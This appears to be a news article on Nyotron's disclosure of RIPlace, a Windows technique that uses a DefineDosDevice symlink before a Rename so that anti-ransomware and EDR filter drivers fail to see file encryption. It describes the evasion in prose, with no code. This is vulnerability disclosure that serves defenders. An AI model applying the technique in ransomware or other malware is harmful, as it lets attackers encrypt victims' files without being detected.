A new type of ransomware technique can evade just about all detection techniques to remain invisible, researchers said.
RIPlace is a Windows file system technique that, when used to maliciously alter files, bypasses most existing anti-ransomware methods as well as other file system/data protections, said Nyotron’s Research team.
“In fact,” the researchers said, “all antivirus products tested so far were completely blind to file operations using this technique, including encryption. Moreover, even endpoint detection and response (EDR) products are blind to this technique and will not be visible for future incident response and investigation purposes.”
Most ransomware perform the following actions:
1. Open and read original file
2. Encrypt content in memory
3. Destruct the original file by:
• Writing encrypted content into original file
• OR saving encrypted file to disk, while removing the original file using Delete file (or any similar method)
• OR saving encrypted file to disk, then replace it with the original file using Rename (Rename has an option to overwrite the target in case it exists on disk)
In order for a filter-driver (and an anti-ransomware or anti-malware product) to be effective against ransomware, these methods should be covered.
In looking at the technique of file replacement using the Rename operation, every time a Rename request is being called (specifically, IRP_MJ_SET_INFORMATION with FileInformationClass set to FileRenameInformation), the filter driver gets a callback, so it could filter the request.
If prior to calling Rename, we call DefineDosDevice (a legacy function that creates a symlink), we can pass an arbitrary name as the device name, and the original file path, as the target to point on. This way we can get our device “XY” to refer to “C: \passwords.txt”.
The RIPlace discovery is in the callback function filter driver fails to parse the destination path when using the common routine FltGetDestinationFileNameInformation. It returns an error when passing a DosDevice path (instead of returning the path, post- processed); however, the Rename call succeeds.
“Using this technique, it is possible to maliciously encrypt file and bypass antivirus/anti-ransomware products that do not properly handle IRP_MJ_SET_INFORMATION callback,” the Nyotron researchers said in a post. “We believe malicious actors may abuse this technique in order to bypass security products that rely on FltGetDestinationFileNameInformation routine as well as avoid any recording of such activity by EDR products.”